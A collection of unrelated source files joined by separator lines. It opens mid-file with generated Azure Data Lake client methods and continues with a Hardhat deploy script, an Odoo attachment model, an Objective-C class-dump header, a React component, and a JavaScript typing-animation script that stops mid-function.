query_parameters['recursive'] = self._serialize.query("recursive", recursive, 'bool')
if continuation is not None:
query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
if cls:
return cls(pipeline_response, None, response_headers)
delete.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def set_access_control(
self,
timeout=None, # type: Optional[int]
owner=None, # type: Optional[str]
group=None, # type: Optional[str]
permissions=None, # type: Optional[str]
acl=None, # type: Optional[str]
request_id_parameter=None, # type: Optional[str]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Set the owner, group, permissions, or access control list for a path.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param owner: Optional. The owner of the blob or directory.
:type owner: str
:param group: Optional. The owning group of the blob or directory.
:type group: str
:param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type permissions: str
:param acl: Sets POSIX access control rights on files and directories. The value is a comma-
separated list of access control entries. Each access control entry (ACE) consists of a scope,
a type, a user or group identifier, and permissions in the format
"[scope:][type]:[id]:[permissions]".
:type acl: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
action = "setAccessControl"
accept = "application/json"
# Construct URL
url = self.set_access_control.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if owner is not None:
header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
if group is not None:
header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
if permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
if acl is not None:
header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.patch(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
if cls:
return cls(pipeline_response, None, response_headers)
set_access_control.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def set_access_control_recursive(
self,
mode, # type: Union[str, "_models.PathSetAccessControlRecursiveMode"]
timeout=None, # type: Optional[int]
continuation=None, # type: Optional[str]
force_flag=None, # type: Optional[bool]
max_records=None, # type: Optional[int]
acl=None, # type: Optional[str]
request_id_parameter=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.SetAccessControlRecursiveResponse"
"""Set the access control list for a path and subpaths.
:param mode: Mode "set" sets POSIX access control rights on files and directories, "modify"
modifies one or more POSIX access control rights that pre-exist on files and directories,
"remove" removes one or more POSIX access control rights that were present earlier on files
and directories.
:type mode: str or ~azure.storage.filedatalake.models.PathSetAccessControlRecursiveMode
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param continuation: Optional. When deleting a directory, the number of paths that are deleted
with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
continuation token is returned in this response header. When a continuation token is returned
in the response, it must be specified in a subsequent invocation of the delete operation to
continue deleting the directory.
:type continuation: str
:param force_flag: Optional. Valid for "SetAccessControlRecursive" operation. If set to false,
the operation will terminate quickly on encountering user errors (4XX). If true, the operation
will ignore user errors and proceed with the operation on other sub-entities of the directory.
Continuation token will only be returned when forceFlag is true in case of user errors. If not
set the default value is false for this.
:type force_flag: bool
:param max_records: Optional. It specifies the maximum number of files or directories on which
the acl change will be applied. If omitted or greater than 2,000, the request will process up
to 2,000 items.
:type max_records: int
:param acl: Sets POSIX access control rights on files and directories. The value is a comma-
separated list of access control entries. Each access control entry (ACE) consists of a scope,
a type, a user or group identifier, and permissions in the format
"[scope:][type]:[id]:[permissions]".
:type acl: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SetAccessControlRecursiveResponse, or the result of cls(response)
:rtype: ~azure.storage.filedatalake.models.SetAccessControlRecursiveResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SetAccessControlRecursiveResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
action = "setAccessControlRecursive"
accept = "application/json"
# Construct URL
url = self.set_access_control_recursive.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if continuation is not None:
query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
if force_flag is not None:
query_parameters['forceFlag'] = self._serialize.query("force_flag", force_flag, 'bool')
if max_records is not None:
query_parameters['maxRecords'] = self._serialize.query("max_records", max_records, 'int', minimum=1)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if acl is not None:
header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.patch(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
deserialized = self._deserialize('SetAccessControlRecursiveResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
set_access_control_recursive.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def flush_data(
self,
timeout=None, # type: Optional[int]
position=None, # type: Optional[int]
retain_uncommitted_data=None, # type: Optional[bool]
close=None, # type: Optional[bool]
content_length=None, # type: Optional[int]
request_id_parameter=None, # type: Optional[str]
path_http_headers=None, # type: Optional["_models.PathHTTPHeaders"]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Set the owner, group, permissions, or access control list for a path.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param position: This parameter allows the caller to upload data in parallel and control the
order in which it is appended to the file. It is required when uploading data to be appended
to the file and when flushing previously uploaded data to the file. The value must be the
position where the data is to be appended. Uploaded data is not immediately flushed, or
written, to the file. To flush, the previously uploaded data must be contiguous, the position
parameter must be specified and equal to the length of the file after all data has been
written, and there must not be a request entity body included with the request.
:type position: long
:param retain_uncommitted_data: Valid only for flush operations. If "true", uncommitted data
is retained after the flush operation completes; otherwise, the uncommitted data is deleted
after the flush operation. The default is false. Data at offsets less than the specified
position are written to the file when flush succeeds, but this optional parameter allows data
after the flush position to be retained for a future flush operation.
:type retain_uncommitted_data: bool
:param close: Azure Storage Events allow applications to receive notifications when files
change. When Azure Storage Events are enabled, a file changed event is raised. This event has a
property indicating whether this is the final change to distinguish the difference between an
intermediate flush to a file stream and the final close of a file stream. The close query
parameter is valid only when the action is "flush" and change notifications are enabled. If the
value of close is "true" and the flush operation completes successfully, the service raises a
file change notification with a property indicating that this is the final update (the file
stream has been closed). If "false" a change notification is raised indicating the file has
changed. The default is false. This query parameter is set to true by the Hadoop ABFS driver to
indicate that the file stream has been closed.".
:type close: bool
:param content_length: Required for "Append Data" and "Flush Data". Must be 0 for "Flush
Data". Must be the length of the request content in bytes for "Append Data".
:type content_length: long
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param path_http_headers: Parameter group.
:type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_content_md5 = None
_lease_id = None
_cache_control = None
_content_type = None
_content_disposition = None
_content_encoding = None
_content_language = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
if path_http_headers is not None:
_content_md5 = path_http_headers.content_md5
_cache_control = path_http_headers.cache_control
_content_type = path_http_headers.content_type
_content_disposition = path_http_headers.content_disposition
_content_encoding = path_http_headers.content_encoding
_content_language = path_http_headers.content_language
action = "flush"
accept = "application/json"
# Construct URL
url = self.flush_data.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if position is not None:
query_parameters['position'] = self._serialize.query("position", position, 'long')
if retain_uncommitted_data is not None:
query_parameters['retainUncommittedData'] = self._serialize.query("retain_uncommitted_data", retain_uncommitted_data, 'bool')
if close is not None:
query_parameters['close'] = self._serialize.query("close", close, 'bool')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if content_length is not None:
header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
if _content_md5 is not None:
header_parameters['x-ms-content-md5'] = self._serialize.header("content_md5", _content_md5, 'bytearray')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
if _content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
if _content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
if _content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
if _content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.patch(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
if cls:
return cls(pipeline_response, None, response_headers)
flush_data.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def append_data(
self,
body, # type: IO
position=None, # type: Optional[int]
timeout=None, # type: Optional[int]
content_length=None, # type: Optional[int]
transactional_content_crc64=None, # type: Optional[bytearray]
request_id_parameter=None, # type: Optional[str]
path_http_headers=None, # type: Optional["_models.PathHTTPHeaders"]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Append data to the file.
:param body: Initial data.
:type body: IO
:param position: This parameter allows the caller to upload data in parallel and control the
order in which it is appended to the file. It is required when uploading data to be appended
to the file and when flushing previously uploaded data to the file. The value must be the
position where the data is to be appended. Uploaded data is not immediately flushed, or
written, to the file. To flush, the previously uploaded data must be contiguous, the position
parameter must be specified and equal to the length of the file after all data has been
written, and there must not be a request entity body included with the request.
:type position: long
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param content_length: Required for "Append Data" and "Flush Data". Must be 0 for "Flush
Data". Must be the length of the request content in bytes for "Append Data".
:type content_length: long
:param transactional_content_crc64: Specify the transactional crc64 for the body, to be
validated by the service.
:type transactional_content_crc64: bytearray
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param path_http_headers: Parameter group.
:type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_transactional_content_hash = None
_lease_id = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if path_http_headers is not None:
_transactional_content_hash = path_http_headers.transactional_content_hash
action = "append"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.append_data.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if position is not None:
query_parameters['position'] = self._serialize.query("position", position, 'long')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if content_length is not None:
header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
if _transactional_content_hash is not None:
header_parameters['Content-MD5'] = self._serialize.header("transactional_content_hash", _transactional_content_hash, 'bytearray')
if transactional_content_crc64 is not None:
header_parameters['x-ms-content-crc64'] = self._serialize.header("transactional_content_crc64", transactional_content_crc64, 'bytearray')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content_kwargs['stream_content'] = body
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5'))
response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64'))
response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted'))
if cls:
return cls(pipeline_response, None, response_headers)
append_data.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def set_expiry(
self,
expiry_options, # type: Union[str, "_models.PathExpiryOptions"]
timeout=None, # type: Optional[int]
request_id_parameter=None, # type: Optional[str]
expires_on=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Sets the time a blob will expire and be deleted.
:param expiry_options: Required. Indicates mode of the expiry time.
:type expiry_options: str or ~azure.storage.filedatalake.models.PathExpiryOptions
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param expires_on: The time to set the blob to expiry.
:type expires_on: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
comp = "expiry"
accept = "application/json"
# Construct URL
url = self.set_expiry.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-expiry-option'] = self._serialize.header("expiry_options", expiry_options, 'str')
if expires_on is not None:
header_parameters['x-ms-expiry-time'] = self._serialize.header("expires_on", expires_on, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
set_expiry.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
|
const hre = require("hardhat");
async function main() {
const Greeter = await hre.ethers.getContractFactory("Greeter");
const greeter = await Greeter.deploy("Hello, Hardhat!");
await greeter.deployed();
console.log("Greeter deployed to:", greeter.address);
}
// We recommend this pattern to be able to use async/await everywhere
// and properly handle errors.
main()
.then(() => process.exit(0))
.catch(error => {
console.error(error);
process.exit(1);
});
|
###################################################################################
#
# Copyright (c) 2017-2019 MuK IT GmbH.
#
# This file is part of MuK Web Utils
# (see https://mukit.at).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
import base64
import logging
import mimetypes
from odoo import api, models, fields, _
from odoo.exceptions import AccessError
from odoo.tools.mimetypes import guess_mimetype
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
_inherit = 'ir.attachment'
#----------------------------------------------------------
# Database
#----------------------------------------------------------
temporary = fields.Boolean(
string="Temporary",
default=False,
help="Attachments will be deleted by Autovacuum.",
)
|
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSArray.h"
@interface NSArray (uniAttribute)
- (void)setInAttributes:(id)arg1 withName:(id)arg2 andType:(id)arg3; // IMP=0x00000001007993e4
@end
|
import React from 'react';
import { ph_title, ph_body } from './Sections';
import PropTypes from 'prop-types';
import '../styles/Section.css';
const TextContent = ({ title, body }) => {
return (
<div className="text-content">
<h2>{ title ? title : ph_title }</h2>
<p>{ body ? body : ph_body }</p>
</div>
);
}
TextContent.propTypes = {
title: PropTypes.string.isRequired,
body: PropTypes.string.isRequired
};
export default TextContent;
|
var Typer = function(element) {
this.element = element;
var delim = element.dataset.delim || ",";
var words = element.dataset.words || "override these,sample typing";
this.words = words.split(delim).filter((v) => v); // non empty words
this.delay = element.dataset.delay || 200;
this.loop = element.dataset.loop || "true";
if (this.loop === "false" ) { this.loop = 1 }
this.deleteDelay = element.dataset.deletedelay || element.dataset.deleteDelay || 800;
this.progress = { word: 0, char: 0, building: true, looped: 0 };
this.typing = true;
var colors = element.dataset.colors || "black";
this.colors = colors.split(",");
this.element.style.color = this.colors[0];
this.colorIndex = 0;
this.doTyping();
};
Typer.prototype.start = function() {
if (!this.typing) {
this.typing = true;
this.doTyping();
}
};
Typer.prototype.stop = function() {
this.typing = false;
};
Typer.prototype.doTyping = function() {
var e = this.element;
var p = this.progress;
var w = p.word;
var c = p.char;
var currentDisplay = [...this.words[w]].slice(0, c).join("");
var atWordEnd;
if (this.cursor) {
this.cursor.element.style.opacity = "1";
this.cursor.on = true;
clearInterval(this.cursor.interval);
this.cursor.interval = setInterval(() => this.cursor.updateBlinkState(), 400);
}
e.innerHTML = currentDisplay;
if (p.building) {
atWordEnd = p.char === this.words[w].length;
if (atWordEnd) {
p.building = false;
} else {
p.char += 1;
}
} else {
if (p.char === 0) {
p.building = true;
p.word = (p.word + 1) % this.words.length;
this.colorIndex = (this.colorIndex + 1) % this.colors.length;
this.element.style.color = this.colors[this.colorIndex];
} else {
p.char -= 1;
}
}
if (p.word === this.words.length - 1) {
p.looped += 1;
}
if (!p.building && this.loop <= p.looped){
this.typing = false;
}
setTimeout(() => {
if (this.typing) { this.doTyping() };
}, atWordEnd ? this.deleteDelay : this.delay);
};
var Cursor = function(element) {
this.element = element;
this.cursorDisplay = element.dataset.cursordisplay || element.dataset.cursorDisplay || "_";
element.innerHTML = this.cursorDisplay;
this.on = true;
element.style.transition = "all 0.1s";
this.interval = setInterval(() => this.updateBlinkState(), 400);
}
Cursor.prototype.updateBlinkState = function() {
